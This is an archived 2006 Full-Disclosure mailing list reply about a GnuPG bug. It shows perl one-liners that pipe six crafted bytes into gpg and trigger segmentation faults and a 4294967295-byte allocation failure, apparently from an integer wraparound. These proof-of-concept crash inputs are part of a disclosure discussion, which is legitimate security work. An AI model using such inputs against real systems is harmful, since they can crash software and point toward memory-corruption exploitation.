[Full-disclosure] GnuPG fun
Steffen Kluge
kluge at fujitsu.com.au
Thu Jun 1 04:20:10 BST 2006
On Wed, 2006-05-31 at 15:55 +0400, Evgeny Legerov wrote:
> $ perl -e 'print "\xcd\xff\xff\xff\xff\xfe"'| /var/gnupg/bin/gpg --no-armor
> gpg: /home/ggg/.gnupg/options:82: deprecated option "honor-http-proxy"
> gpg: please use "keyserver-options http-proxy" instead
>
> gpg: Segmentation fault caught ... exiting
> Segmentation fault
Something wrapping around?
$ perl -e 'print "\xcd\xff\xff\xff\xff\xaf"'|gpg --no-armor
gpg: out of memory while allocating 4294967295 bytes
$ perl -e 'print "\xcd\xff\xff\xff\xff\xb0"'|gpg --no-armor
gpg: Segmentation fault caught ... exiting
4294967295 is 0xffffffff, of course.
Also works with gpg2 (v.1.9.20)
Cheers
Steffen.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060601/0261c479/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.